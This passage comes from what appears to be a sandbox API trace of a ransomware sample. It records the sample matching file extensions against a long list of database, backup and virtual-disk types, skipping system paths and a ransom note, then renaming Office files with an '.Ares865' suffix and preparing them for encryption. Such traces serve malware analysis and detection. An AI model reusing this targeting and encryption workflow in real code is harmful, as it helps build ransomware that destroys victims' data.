3 [0088.195] lstrcmpiW (lpString1="dll", lpString2="fp3") returned -1 [0088.195] lstrlenW (lpString="fp4") returned 3 [0088.195] lstrcmpiW (lpString1="dll", lpString2="fp4") returned -1 [0088.195] lstrlenW (lpString="fp5") returned 3 [0088.195] lstrcmpiW (lpString1="dll", lpString2="fp5") returned -1 [0088.195] lstrlenW (lpString="fp7") returned 3 [0088.195] lstrcmpiW (lpString1="dll", lpString2="fp7") returned -1 [0088.195] lstrlenW (lpString="fpt") returned 3 [0088.195] lstrcmpiW (lpString1="dll", lpString2="fpt") returned -1 [0088.195] lstrlenW (lpString="frm") returned 3 [0088.195] lstrcmpiW (lpString1="dll", lpString2="frm") returned -1 [0088.195] lstrlenW (lpString="gdb") returned 3 [0088.195] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0088.195] lstrlenW (lpString="gdb") returned 3 [0088.195] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0088.195] lstrlenW (lpString="grdb") returned 4 [0088.195] lstrcmpiW (lpString1="_dll", lpString2="grdb") returned -1 [0088.195] lstrlenW (lpString="gwi") returned 3 [0088.195] lstrcmpiW (lpString1="dll", lpString2="gwi") returned -1 [0088.195] lstrlenW (lpString="hdb") returned 3 [0088.195] lstrcmpiW (lpString1="dll", lpString2="hdb") returned -1 [0088.195] lstrlenW (lpString="his") returned 3 [0088.195] lstrcmpiW (lpString1="dll", lpString2="his") returned -1 [0088.195] lstrlenW (lpString="ib") returned 2 [0088.195] lstrcmpiW (lpString1="ll", lpString2="ib") returned 1 [0088.195] lstrlenW (lpString="idb") returned 3 [0088.195] lstrcmpiW (lpString1="dll", lpString2="idb") returned -1 [0088.196] lstrlenW (lpString="ihx") returned 3 [0088.196] lstrcmpiW (lpString1="dll", lpString2="ihx") returned -1 [0088.196] lstrlenW (lpString="itdb") returned 4 [0088.196] lstrcmpiW (lpString1="_dll", lpString2="itdb") returned -1 [0088.196] lstrlenW (lpString="itw") returned 3 [0088.196] lstrcmpiW (lpString1="dll", lpString2="itw") returned -1 [0088.196] lstrlenW (lpString="jet") returned 3 [0088.196] lstrcmpiW (lpString1="dll", lpString2="jet") returned -1 [0088.196] lstrlenW (lpString="jtx") returned 3 [0088.196] lstrcmpiW (lpString1="dll", lpString2="jtx") returned -1 [0088.196] lstrlenW (lpString="kdb") returned 3 [0088.196] lstrcmpiW (lpString1="dll", lpString2="kdb") returned -1 [0088.196] lstrlenW (lpString="kexi") returned 4 [0088.196] lstrcmpiW (lpString1="_dll", lpString2="kexi") returned -1 [0088.196] lstrlenW (lpString="kexic") returned 5 [0088.196] lstrcmpiW (lpString1="x_dll", lpString2="kexic") returned 1 [0088.196] lstrlenW (lpString="kexis") returned 5 [0088.196] lstrcmpiW (lpString1="x_dll", lpString2="kexis") returned 1 [0088.196] lstrlenW (lpString="lgc") returned 3 [0088.196] lstrcmpiW (lpString1="dll", lpString2="lgc") returned -1 [0088.196] lstrlenW (lpString="lwx") returned 3 [0088.196] lstrcmpiW (lpString1="dll", lpString2="lwx") returned -1 [0088.196] lstrlenW (lpString="maf") returned 3 [0088.196] lstrcmpiW (lpString1="dll", lpString2="maf") returned -1 [0088.196] lstrlenW (lpString="maq") returned 3 [0088.196] lstrcmpiW (lpString1="dll", lpString2="maq") returned -1 [0088.196] lstrlenW (lpString="mar") returned 3 [0088.196] lstrcmpiW (lpString1="dll", lpString2="mar") returned -1 [0088.196] lstrlenW (lpString="marshal") returned 7 [0088.196] lstrcmpiW (lpString1="trx_dll", lpString2="marshal") returned 1 [0088.196] lstrlenW (lpString="mas") returned 3 [0088.197] lstrcmpiW (lpString1="dll", lpString2="mas") returned -1 [0088.197] lstrlenW (lpString="mav") returned 3 [0088.197] lstrcmpiW (lpString1="dll", lpString2="mav") returned -1 [0088.197] lstrlenW (lpString="maw") returned 3 [0088.197] lstrcmpiW (lpString1="dll", lpString2="maw") returned -1 [0088.197] lstrlenW (lpString="mdbhtml") returned 7 [0088.197] lstrcmpiW (lpString1="trx_dll", lpString2="mdbhtml") returned 1 [0088.197] lstrlenW (lpString="mdn") returned 3 [0088.197] lstrcmpiW (lpString1="dll", lpString2="mdn") returned -1 [0088.197] lstrlenW (lpString="mdt") returned 3 [0088.197] lstrcmpiW (lpString1="dll", lpString2="mdt") returned -1 [0088.197] lstrlenW (lpString="mfd") returned 3 [0088.197] lstrcmpiW (lpString1="dll", lpString2="mfd") returned -1 [0088.197] lstrlenW (lpString="mpd") returned 3 [0088.197] lstrcmpiW (lpString1="dll", lpString2="mpd") returned -1 [0088.197] lstrlenW (lpString="mrg") returned 3 [0088.197] lstrcmpiW (lpString1="dll", lpString2="mrg") returned -1 [0088.197] lstrlenW (lpString="mud") returned 3 [0088.197] lstrcmpiW (lpString1="dll", lpString2="mud") returned -1 [0088.197] lstrlenW (lpString="mwb") returned 3 [0088.197] lstrcmpiW (lpString1="dll", lpString2="mwb") returned -1 [0088.197] lstrlenW (lpString="myd") returned 3 [0088.197] lstrcmpiW (lpString1="dll", lpString2="myd") returned -1 [0088.197] lstrlenW (lpString="ndf") returned 3 [0088.197] lstrcmpiW (lpString1="dll", lpString2="ndf") returned -1 [0088.197] lstrlenW (lpString="nnt") returned 3 [0088.197] lstrcmpiW (lpString1="dll", lpString2="nnt") returned -1 [0088.197] lstrlenW (lpString="nrmlib") returned 6 [0088.197] lstrcmpiW (lpString1="rx_dll", lpString2="nrmlib") returned 1 [0088.197] lstrlenW (lpString="ns2") returned 3 [0088.197] lstrcmpiW (lpString1="dll", lpString2="ns2") returned -1 [0088.197] lstrlenW (lpString="ns3") returned 3 [0088.197] lstrcmpiW (lpString1="dll", lpString2="ns3") returned -1 [0088.197] lstrlenW (lpString="ns4") returned 3 [0088.197] lstrcmpiW (lpString1="dll", lpString2="ns4") returned -1 [0088.197] lstrlenW (lpString="nsf") returned 3 [0088.197] lstrcmpiW (lpString1="dll", lpString2="nsf") returned -1 [0088.197] lstrlenW (lpString="nv") returned 2 [0088.197] lstrcmpiW (lpString1="ll", lpString2="nv") returned -1 [0088.198] lstrlenW (lpString="nv2") returned 3 [0088.198] lstrcmpiW (lpString1="dll", lpString2="nv2") returned -1 [0088.198] lstrlenW (lpString="nwdb") returned 4 [0088.198] lstrcmpiW (lpString1="_dll", lpString2="nwdb") returned -1 [0088.198] lstrlenW (lpString="nyf") returned 3 [0088.198] lstrcmpiW (lpString1="dll", lpString2="nyf") returned -1 [0088.198] lstrlenW (lpString="odb") returned 3 [0088.198] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0088.198] lstrlenW (lpString="odb") returned 3 [0088.198] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0088.198] lstrlenW (lpString="oqy") returned 3 [0088.198] lstrcmpiW (lpString1="dll", lpString2="oqy") returned -1 [0088.198] lstrlenW (lpString="ora") returned 3 [0088.198] lstrcmpiW (lpString1="dll", lpString2="ora") returned -1 [0088.198] lstrlenW (lpString="orx") returned 3 [0088.198] lstrcmpiW (lpString1="dll", lpString2="orx") returned -1 [0088.198] lstrlenW (lpString="owc") returned 3 [0088.198] lstrcmpiW (lpString1="dll", lpString2="owc") returned -1 [0088.198] lstrlenW (lpString="p96") returned 3 [0088.198] lstrcmpiW (lpString1="dll", lpString2="p96") returned -1 [0088.198] lstrlenW (lpString="p97") returned 3 [0088.198] lstrcmpiW (lpString1="dll", lpString2="p97") returned -1 [0088.198] lstrlenW (lpString="pan") returned 3 [0088.198] lstrcmpiW (lpString1="dll", lpString2="pan") returned -1 [0088.198] lstrlenW (lpString="pdb") returned 3 [0088.198] lstrcmpiW (lpString1="dll", lpString2="pdb") returned -1 [0088.198] lstrlenW (lpString="pdm") returned 3 [0088.198] lstrcmpiW (lpString1="dll", lpString2="pdm") returned -1 [0088.198] lstrlenW (lpString="pnz") returned 3 [0088.198] lstrcmpiW (lpString1="dll", lpString2="pnz") returned -1 [0088.198] lstrlenW (lpString="qry") returned 3 [0088.198] lstrcmpiW (lpString1="dll", lpString2="qry") returned -1 [0088.198] lstrlenW (lpString="qvd") returned 3 [0088.198] lstrcmpiW (lpString1="dll", lpString2="qvd") returned -1 [0088.198] lstrlenW (lpString="rbf") returned 3 [0088.198] lstrcmpiW (lpString1="dll", lpString2="rbf") returned -1 [0088.198] lstrlenW (lpString="rctd") returned 4 [0088.198] lstrcmpiW (lpString1="_dll", lpString2="rctd") returned -1 [0088.199] lstrlenW (lpString="rod") returned 3 [0088.199] lstrcmpiW (lpString1="dll", lpString2="rod") returned -1 [0088.199] lstrlenW (lpString="rodx") returned 4 [0088.199] lstrcmpiW (lpString1="_dll", lpString2="rodx") returned -1 [0088.199] lstrlenW (lpString="rpd") returned 3 [0088.199] lstrcmpiW (lpString1="dll", lpString2="rpd") returned -1 [0088.199] lstrlenW (lpString="rsd") returned 3 [0088.199] lstrcmpiW (lpString1="dll", lpString2="rsd") returned -1 [0088.199] lstrlenW (lpString="sas7bdat") returned 8 [0088.199] lstrcmpiW (lpString1=".trx_dll", lpString2="sas7bdat") returned -1 [0088.199] lstrlenW (lpString="sbf") returned 3 [0088.199] lstrcmpiW (lpString1="dll", lpString2="sbf") returned -1 [0088.199] lstrlenW (lpString="scx") returned 3 [0088.199] lstrcmpiW (lpString1="dll", lpString2="scx") returned -1 [0088.199] lstrlenW (lpString="sdb") returned 3 [0088.199] lstrcmpiW (lpString1="dll", lpString2="sdb") returned -1 [0088.199] lstrlenW (lpString="sdc") returned 3 [0088.199] lstrcmpiW (lpString1="dll", lpString2="sdc") returned -1 [0088.199] lstrlenW (lpString="sdf") returned 3 [0088.199] lstrcmpiW (lpString1="dll", lpString2="sdf") returned -1 [0088.199] lstrlenW (lpString="sis") returned 3 [0088.199] lstrcmpiW (lpString1="dll", lpString2="sis") returned -1 [0088.199] lstrlenW (lpString="spq") returned 3 [0088.199] lstrcmpiW (lpString1="dll", lpString2="spq") returned -1 [0088.199] lstrlenW (lpString="te") returned 2 [0088.199] lstrcmpiW (lpString1="ll", lpString2="te") returned -1 [0088.199] lstrlenW (lpString="teacher") returned 7 [0088.199] lstrcmpiW (lpString1="trx_dll", lpString2="teacher") returned 1 [0088.199] lstrlenW (lpString="tmd") returned 3 [0088.199] lstrcmpiW (lpString1="dll", lpString2="tmd") returned -1 [0088.199] lstrlenW (lpString="tps") returned 3 [0088.199] lstrcmpiW (lpString1="dll", lpString2="tps") returned -1 [0088.199] lstrlenW (lpString="trc") returned 3 [0088.199] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0088.199] lstrlenW (lpString="trc") returned 3 [0088.199] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0088.199] lstrlenW (lpString="trm") returned 3 [0088.199] lstrcmpiW (lpString1="dll", lpString2="trm") returned -1 [0088.200] lstrlenW (lpString="udb") returned 3 [0088.200] lstrcmpiW (lpString1="dll", lpString2="udb") returned -1 [0088.200] lstrlenW (lpString="udl") returned 3 [0088.200] lstrcmpiW (lpString1="dll", lpString2="udl") returned -1 [0088.200] lstrlenW (lpString="usr") returned 3 [0088.200] lstrcmpiW (lpString1="dll", lpString2="usr") returned -1 [0088.200] lstrlenW (lpString="v12") returned 3 [0088.200] lstrcmpiW (lpString1="dll", lpString2="v12") returned -1 [0088.200] lstrlenW (lpString="vis") returned 3 [0088.200] lstrcmpiW (lpString1="dll", lpString2="vis") returned -1 [0088.200] lstrlenW (lpString="vpd") returned 3 [0088.200] lstrcmpiW (lpString1="dll", lpString2="vpd") returned -1 [0088.200] lstrlenW (lpString="vvv") returned 3 [0088.200] lstrcmpiW (lpString1="dll", lpString2="vvv") returned -1 [0088.200] lstrlenW (lpString="wdb") returned 3 [0088.200] lstrcmpiW (lpString1="dll", lpString2="wdb") returned -1 [0088.200] lstrlenW (lpString="wmdb") returned 4 [0088.200] lstrcmpiW (lpString1="_dll", lpString2="wmdb") returned -1 [0088.200] lstrlenW (lpString="wrk") returned 3 [0088.200] lstrcmpiW (lpString1="dll", lpString2="wrk") returned -1 [0088.200] lstrlenW (lpString="xdb") returned 3 [0088.200] lstrcmpiW (lpString1="dll", lpString2="xdb") returned -1 [0088.200] lstrlenW (lpString="xld") returned 3 [0088.200] lstrcmpiW (lpString1="dll", lpString2="xld") returned -1 [0088.200] lstrlenW (lpString="xmlff") returned 5 [0088.200] lstrcmpiW (lpString1="x_dll", lpString2="xmlff") returned -1 [0088.200] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.REST.trx_dll.Ares865") returned 79 [0088.200] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\ppintl.rest.trx_dll"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.REST.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\ppintl.rest.trx_dll.ares865"), dwFlags=0x1) returned 1 [0088.201] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.REST.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\ppintl.rest.trx_dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0088.201] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=286560) returned 1 [0088.201] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0088.202] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0088.202] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0088.202] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0088.202] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0088.202] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0088.203] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x46260, lpName=0x0) returned 0x15c [0088.204] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x46260) returned 0x420000 [0088.218] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0088.218] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0088.218] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0088.219] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0088.219] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0088.219] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0088.219] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0088.219] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0088.219] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0088.219] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0088.219] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0088.219] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0088.219] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0088.219] UnmapViewOfFile (lpBaseAddress=0x420000) returned 1 [0088.222] CloseHandle (hObject=0x15c) returned 1 [0088.222] CloseHandle (hObject=0x118) returned 1 [0088.222] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0088.222] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0088.222] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0088.223] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa3b09500, ftCreationTime.dwHighDateTime=0x1cac809, ftLastAccessTime.dwLowDateTime=0xef00bf70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xa3b09500, ftLastWriteTime.dwHighDateTime=0x1cac809, nFileSizeHigh=0x0, nFileSizeLow=0x1a360, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PUB6INTL.DLL.trx_dll", cAlternateFileName="PUB6IN~1.TRX")) returned 1 [0088.223] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0088.223] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll", lpString2="aoldtz.exe") returned 1 [0088.223] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll", lpString2=".") returned 1 [0088.223] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll", lpString2="..") returned 1 [0088.223] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll", lpString2="windows") returned -1 [0088.223] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll", lpString2="bootmgr") returned 1 [0088.223] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll", lpString2="temp") returned -1 [0088.223] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll", lpString2="pagefile.sys") returned 1 [0088.223] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll", lpString2="boot") returned 1 [0088.223] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll", lpString2="ids.txt") returned 1 [0088.224] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll", lpString2="ntuser.dat") returned 1 [0088.224] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll", lpString2="perflogs") returned 1 [0088.224] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll", lpString2="MSBuild") returned 1 [0088.224] lstrlenW (lpString="PUB6INTL.DLL.trx_dll") returned 20 [0088.224] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.REST.trx_dll") returned 71 [0088.224] lstrcpyW (in: lpString1=0x2cce468, lpString2="PUB6INTL.DLL.trx_dll" | out: lpString1="PUB6INTL.DLL.trx_dll") returned="PUB6INTL.DLL.trx_dll" [0088.224] lstrlenW (lpString="PUB6INTL.DLL.trx_dll") returned 20 [0088.224] lstrlenW (lpString="Ares865") returned 7 [0088.224] lstrcmpiW (lpString1="trx_dll", lpString2="Ares865") returned 1 [0088.224] lstrlenW (lpString=".dll") returned 4 [0088.224] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll", lpString2=".dll") returned 1 [0088.224] lstrlenW (lpString=".lnk") returned 4 [0088.224] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll", lpString2=".lnk") returned 1 [0088.224] lstrlenW (lpString=".ini") returned 4 [0088.224] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll", lpString2=".ini") returned 1 [0088.224] lstrlenW (lpString=".sys") returned 4 [0088.224] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll", lpString2=".sys") returned 1 [0088.224] lstrlenW (lpString="PUB6INTL.DLL.trx_dll") returned 20 [0088.224] lstrlenW (lpString="bak") returned 3 [0088.224] lstrcmpiW (lpString1="dll", lpString2="bak") returned 1 [0088.224] lstrlenW (lpString="ba_") returned 3 [0088.224] lstrcmpiW (lpString1="dll", lpString2="ba_") returned 1 [0088.224] lstrlenW (lpString="dbb") returned 3 [0088.224] lstrcmpiW (lpString1="dll", lpString2="dbb") returned 1 [0088.224] lstrlenW (lpString="vmdk") returned 4 [0088.224] lstrcmpiW (lpString1="_dll", lpString2="vmdk") returned -1 [0088.224] lstrlenW (lpString="rar") returned 3 [0088.224] lstrcmpiW (lpString1="dll", lpString2="rar") returned -1 [0088.224] lstrlenW (lpString="zip") returned 3 [0088.224] lstrcmpiW (lpString1="dll", lpString2="zip") returned -1 [0088.224] lstrlenW (lpString="tgz") returned 3 [0088.224] lstrcmpiW (lpString1="dll", lpString2="tgz") returned -1 [0088.224] lstrlenW (lpString="vbox") returned 4 [0088.224] lstrcmpiW (lpString1="_dll", lpString2="vbox") returned -1 [0088.224] lstrlenW (lpString="vdi") returned 3 [0088.224] lstrcmpiW (lpString1="dll", lpString2="vdi") returned -1 [0088.224] lstrlenW (lpString="vhd") returned 3 [0088.224] lstrcmpiW (lpString1="dll", lpString2="vhd") returned -1 [0088.225] lstrlenW (lpString="vhdx") returned 4 [0088.225] lstrcmpiW (lpString1="_dll", lpString2="vhdx") returned -1 [0088.225] lstrlenW (lpString="avhd") returned 4 [0088.225] lstrcmpiW (lpString1="_dll", lpString2="avhd") returned -1 [0088.225] lstrlenW (lpString="db") returned 2 [0088.225] lstrcmpiW (lpString1="ll", lpString2="db") returned 1 [0088.225] lstrlenW (lpString="db2") returned 3 [0088.225] lstrcmpiW (lpString1="dll", lpString2="db2") returned 1 [0088.225] lstrlenW (lpString="db3") returned 3 [0088.225] lstrcmpiW (lpString1="dll", lpString2="db3") returned 1 [0088.225] lstrlenW (lpString="dbf") returned 3 [0088.225] lstrcmpiW (lpString1="dll", lpString2="dbf") returned 1 [0088.225] lstrlenW (lpString="mdf") returned 3 [0088.225] lstrcmpiW (lpString1="dll", lpString2="mdf") returned -1 [0088.225] lstrlenW (lpString="mdb") returned 3 [0088.225] lstrcmpiW (lpString1="dll", lpString2="mdb") returned -1 [0088.225] lstrlenW (lpString="sql") returned 3 [0088.225] lstrcmpiW (lpString1="dll", lpString2="sql") returned -1 [0088.225] lstrlenW (lpString="sqlite") returned 6 [0088.225] lstrcmpiW (lpString1="rx_dll", lpString2="sqlite") returned -1 [0088.225] lstrlenW (lpString="sqlite3") returned 7 [0088.225] lstrcmpiW (lpString1="trx_dll", lpString2="sqlite3") returned 1 [0088.225] lstrlenW (lpString="sqlitedb") returned 8 [0088.225] lstrcmpiW (lpString1=".trx_dll", lpString2="sqlitedb") returned -1 [0088.225] lstrlenW (lpString="xml") returned 3 [0088.225] lstrcmpiW (lpString1="dll", lpString2="xml") returned -1 [0088.225] lstrlenW (lpString="$er") returned 3 [0088.225] lstrcmpiW (lpString1="dll", lpString2="$er") returned 1 [0088.225] lstrlenW (lpString="4dd") returned 3 [0088.225] lstrcmpiW (lpString1="dll", lpString2="4dd") returned 1 [0088.225] lstrlenW (lpString="4dl") returned 3 [0088.225] lstrcmpiW (lpString1="dll", lpString2="4dl") returned 1 [0088.225] lstrlenW (lpString="^^^") returned 3 [0088.225] lstrcmpiW (lpString1="dll", lpString2="^^^") returned 1 [0088.225] lstrlenW (lpString="abs") returned 3 [0088.225] lstrcmpiW (lpString1="dll", lpString2="abs") returned 1 [0088.225] lstrlenW (lpString="abx") returned 3 [0088.225] lstrcmpiW (lpString1="dll", lpString2="abx") returned 1 [0088.225] lstrlenW (lpString="accdb") returned 5 [0088.226] lstrcmpiW (lpString1="x_dll", lpString2="accdb") returned 1 [0088.226] lstrlenW (lpString="accdc") returned 5 [0088.226] lstrcmpiW (lpString1="x_dll", lpString2="accdc") returned 1 [0088.226] lstrlenW (lpString="accde") returned 5 [0088.226] lstrcmpiW (lpString1="x_dll", lpString2="accde") returned 1 [0088.226] lstrlenW (lpString="accdr") returned 5 [0088.226] lstrcmpiW (lpString1="x_dll", lpString2="accdr") returned 1 [0088.226] lstrlenW (lpString="accdt") returned 5 [0088.226] lstrcmpiW (lpString1="x_dll", lpString2="accdt") returned 1 [0088.226] lstrlenW (lpString="accdw") returned 5 [0088.226] lstrcmpiW (lpString1="x_dll", lpString2="accdw") returned 1 [0088.226] lstrlenW (lpString="accft") returned 5 [0088.226] lstrcmpiW (lpString1="x_dll", lpString2="accft") returned 1 [0088.226] lstrlenW (lpString="adb") returned 3 [0088.226] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0088.226] lstrlenW (lpString="adb") returned 3 [0088.226] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0088.226] lstrlenW (lpString="ade") returned 3 [0088.226] lstrcmpiW (lpString1="dll", lpString2="ade") returned 1 [0088.226] lstrlenW (lpString="adf") returned 3 [0088.226] lstrcmpiW (lpString1="dll", lpString2="adf") returned 1 [0088.226] lstrlenW (lpString="adn") returned 3 [0088.226] lstrcmpiW (lpString1="dll", lpString2="adn") returned 1 [0088.226] lstrlenW (lpString="adp") returned 3 [0088.226] lstrcmpiW (lpString1="dll", lpString2="adp") returned 1 [0088.226] lstrlenW (lpString="alf") returned 3 [0088.226] lstrcmpiW (lpString1="dll", lpString2="alf") returned 1 [0088.226] lstrlenW (lpString="ask") returned 3 [0088.226] lstrcmpiW (lpString1="dll", lpString2="ask") returned 1 [0088.226] lstrlenW (lpString="btr") returned 3 [0088.226] lstrcmpiW (lpString1="dll", lpString2="btr") returned 1 [0088.226] lstrlenW (lpString="cat") returned 3 [0088.226] lstrcmpiW (lpString1="dll", lpString2="cat") returned 1 [0088.226] lstrlenW (lpString="cdb") returned 3 [0088.226] lstrcmpiW (lpString1="dll", lpString2="cdb") returned 1 [0088.226] lstrlenW (lpString="ckp") returned 3 [0088.226] lstrcmpiW (lpString1="dll", lpString2="ckp") returned 1 [0088.226] lstrlenW (lpString="cma") returned 3 [0088.227] lstrcmpiW (lpString1="dll", lpString2="cma") returned 1 [0088.227] lstrlenW (lpString="cpd") returned 3 [0088.227] lstrcmpiW (lpString1="dll", lpString2="cpd") returned 1 [0088.227] lstrlenW (lpString="dacpac") returned 6 [0088.227] lstrcmpiW (lpString1="rx_dll", lpString2="dacpac") returned 1 [0088.227] lstrlenW (lpString="dad") returned 3 [0088.227] lstrcmpiW (lpString1="dll", lpString2="dad") returned 1 [0088.227] lstrlenW (lpString="dadiagrams") returned 10 [0088.227] lstrcmpiW (lpString1="LL.trx_dll", lpString2="dadiagrams") returned 1 [0088.227] lstrlenW (lpString="daschema") returned 8 [0088.227] lstrcmpiW (lpString1=".trx_dll", lpString2="daschema") returned -1 [0088.227] lstrlenW (lpString="db-journal") returned 10 [0088.227] lstrcmpiW (lpString1="LL.trx_dll", lpString2="db-journal") returned 1 [0088.227] lstrlenW (lpString="db-shm") returned 6 [0088.227] lstrcmpiW (lpString1="rx_dll", lpString2="db-shm") returned 1 [0088.227] lstrlenW (lpString="db-wal") returned 6 [0088.227] lstrcmpiW (lpString1="rx_dll", lpString2="db-wal") returned 1 [0088.227] lstrlenW (lpString="dbc") returned 3 [0088.227] lstrcmpiW (lpString1="dll", lpString2="dbc") returned 1 [0088.227] lstrlenW (lpString="dbs") returned 3 [0088.227] lstrcmpiW (lpString1="dll", lpString2="dbs") returned 1 [0088.227] lstrlenW (lpString="dbt") returned 3 [0088.227] lstrcmpiW (lpString1="dll", lpString2="dbt") returned 1 [0088.227] lstrlenW (lpString="dbv") returned 3 [0088.227] lstrcmpiW (lpString1="dll", lpString2="dbv") returned 1 [0088.227] lstrlenW (lpString="dbx") returned 3 [0088.227] lstrcmpiW (lpString1="dll", lpString2="dbx") returned 1 [0088.227] lstrlenW (lpString="dcb") returned 3 [0088.227] lstrcmpiW (lpString1="dll", lpString2="dcb") returned 1 [0088.227] lstrlenW (lpString="dct") returned 3 [0088.227] lstrcmpiW (lpString1="dll", lpString2="dct") returned 1 [0088.227] lstrlenW (lpString="dcx") returned 3 [0088.227] lstrcmpiW (lpString1="dll", lpString2="dcx") returned 1 [0088.227] lstrlenW (lpString="ddl") returned 3 [0088.227] lstrcmpiW (lpString1="dll", lpString2="ddl") returned 1 [0088.227] lstrlenW (lpString="dlis") returned 4 [0088.227] lstrcmpiW (lpString1="_dll", lpString2="dlis") returned -1 [0088.228] lstrlenW (lpString="dp1") returned 3 [0088.228] lstrcmpiW (lpString1="dll", lpString2="dp1") returned -1 [0088.228] lstrlenW (lpString="dqy") returned 3 [0088.228] lstrcmpiW (lpString1="dll", lpString2="dqy") returned -1 [0088.228] lstrlenW (lpString="dsk") returned 3 [0088.228] lstrcmpiW (lpString1="dll", lpString2="dsk") returned -1 [0088.228] lstrlenW (lpString="dsn") returned 3 [0088.228] lstrcmpiW (lpString1="dll", lpString2="dsn") returned -1 [0088.228] lstrlenW (lpString="dtsx") returned 4 [0088.228] lstrcmpiW (lpString1="_dll", lpString2="dtsx") returned -1 [0088.228] lstrlenW (lpString="dxl") returned 3 [0088.228] lstrcmpiW (lpString1="dll", lpString2="dxl") returned -1 